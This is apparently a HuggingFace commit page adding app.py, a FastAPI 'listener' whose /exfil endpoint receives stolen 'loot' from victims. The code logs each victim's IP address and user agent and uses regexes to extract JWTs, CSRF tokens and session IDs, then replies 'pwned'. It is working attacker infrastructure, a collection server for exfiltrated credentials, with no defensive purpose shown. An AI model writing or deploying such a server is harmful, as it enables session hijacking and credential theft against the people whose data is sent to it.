latterworks commited on
Commit
0a404ca
·
verified ·
1 Parent(s): e8c2df0

Create app.py

Browse files
Files changed (1) hide show
  1. app.py +37 -0
app.py ADDED
@@ -0,0 +1,37 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # app.py — HuggingFace App Space listener
2
+ from fastapi import FastAPI, Request
3
+ from datetime import datetime
4
+ import json, re
5
+
6
+ app = FastAPI()
7
+ LOGFILE = "slurp.log"
8
+
9
+ def mark(loot):
10
+ text = json.dumps(loot)
11
+ return {
12
+ "jwt": re.findall(r'eyJ[A-Za-z0-9-_]+\.[A-Za-z0-9-_]+\.[A-Za-z0-9-_]+', text),
13
+ "csrf": re.findall(r'csrf[_\-]?token[\'"]?\s*[:=]\s*[\'"]?([a-zA-Z0-9\-_]{8,})', text, re.I),
14
+ "sid": re.findall(r'session(?:id)?=([a-zA-Z0-9\-_.]{10,})', text, re.I)
15
+ }
16
+
17
+ @app.post("/exfil")
18
+ async def exfil(request: Request):
19
+ try:
20
+ data = await request.json()
21
+ except:
22
+ return {"error": "bad json"}
23
+
24
+ log = {
25
+ "timestamp": datetime.utcnow().isoformat(),
26
+ "ip": request.headers.get("x-forwarded-for", "unknown"),
27
+ "ua": request.headers.get("user-agent", "unknown"),
28
+ "loot": data,
29
+ "marks": mark(data)
30
+ }
31
+
32
+ with open(LOGFILE, "a") as f:
33
+ f.write(json.dumps(log, indent=2) + ",\n")
34
+
35
+ print(f"\n[YEET] {log['ip']} @ {log['timestamp']}")
36
+ print(json.dumps(log["marks"], indent=2))
37
+ return {"status": "pwned", "marks": log["marks"]}